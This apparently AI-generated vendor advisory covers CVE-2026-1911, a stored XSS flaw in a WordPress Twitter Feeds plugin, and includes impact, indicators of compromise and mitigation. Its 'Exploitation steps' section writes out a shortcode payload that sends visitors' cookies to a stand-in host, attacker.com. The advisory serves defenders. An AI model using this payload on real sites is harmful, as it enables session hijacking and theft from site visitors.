CVE-2026-1911
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-1911 is a Stored Cross-Site Scripting (XSS) vulnerability in the Twitter Feeds plugin for WordPress, affecting all versions up to and including 1.0.0. The flaw exists in the tweet_title parameter of the TwitterFeeds shortcode due to insufficient input sanitization and output escaping. It was published on March 21, 2026, with Wordfence credited as the assigner. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically a stored XSS variant. The vulnerable code is located in twitter-feeds.php at line 490, where the tweet_title parameter passed to the TwitterFeeds shortcode is rendered without proper sanitization or escaping. An authenticated attacker with at least Contributor-level access can embed malicious JavaScript in a post or page using the shortcode; the script executes in the browser of any user who subsequently visits the affected page. No special configuration is required beyond having the plugin active and Contributor-level credentials (Wordfence, WordPress Trac).

Impact

Successful exploitation allows an attacker to inject and persistently store arbitrary JavaScript that executes in the context of any visitor's browser session on the affected WordPress site. This can lead to session cookie theft, credential harvesting, defacement, redirection to malicious sites, or further attacks against site administrators — potentially escalating to full site compromise if an admin account is hijacked. Confidentiality and integrity are both impacted (low severity each per CVSS), while availability is unaffected (Wordfence).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-1911 as of the available data. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires authenticated access at the Contributor level or above, which limits the attack surface compared to unauthenticated vulnerabilities (Wordfence, Red Hat CVE).

Exploitation steps

  1. Obtain Contributor-level access: Register or compromise a WordPress account with at least Contributor privileges on a site running the Twitter Feeds plugin version 1.0.0 or earlier.
  2. Create or edit a post: Navigate to the WordPress post editor and insert the TwitterFeeds shortcode with a malicious payload in the tweet_title parameter, e.g., [TwitterFeeds tweet_title="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].
  3. Publish the post: Submit or update the post so the malicious shortcode content is stored in the WordPress database.
  4. Trigger execution: When any user (including administrators) visits the page containing the injected shortcode, the unsanitized tweet_title value is rendered in the HTML response, causing the browser to execute the injected script.
  5. Harvest results: Collect stolen session cookies, credentials, or other data at the attacker-controlled endpoint to enable session hijacking or further privilege escalation (Wordfence, WordPress Trac).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to wp-admin/post.php or the REST API containing tweet_title parameters with HTML tags, <script>, or encoded JavaScript (e.g., %3Cscript%3E).
  • Database: Unexpected JavaScript or HTML script tags stored in the wp_posts table within shortcode content referencing TwitterFeeds.
  • Network: Outbound requests from victim browsers to unfamiliar external domains shortly after loading pages containing the TwitterFeeds shortcode, potentially carrying cookie or session data in query parameters.
  • File System: Unexpected modifications to twitter-feeds.php or related plugin files if an attacker escalates to file write access after session hijacking.

Mitigation and workarounds

The primary remediation is to update the Twitter Feeds plugin beyond version 1.0.0 once a patched release is made available by the vendor (viaviwebtech). If no patch is available, site administrators should deactivate and remove the plugin immediately. As an interim measure, restrict Contributor-level user registration and audit existing Contributor accounts for unauthorized activity. Web application firewalls (WAFs) with XSS filtering rules can provide additional defense-in-depth (Wordfence).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-78361CRITICAL9.1
  • zipmoney-payments-woocommerce
NoYesSep 10, 2026
CVE-2026-82925HIGH8.1
  • site-reviews
NoYesSep 10, 2026
CVE-2026-77771HIGH7.5
  • miniorange-2-factor-authentication
NoYesSep 10, 2026
CVE-2026-81431HIGH7.2
  • registration-form-for-woocommerce
NoYesSep 10, 2026
CVE-2026-15889MEDIUM6.4
  • aruba-hispeed-cache
NoYesSep 10, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management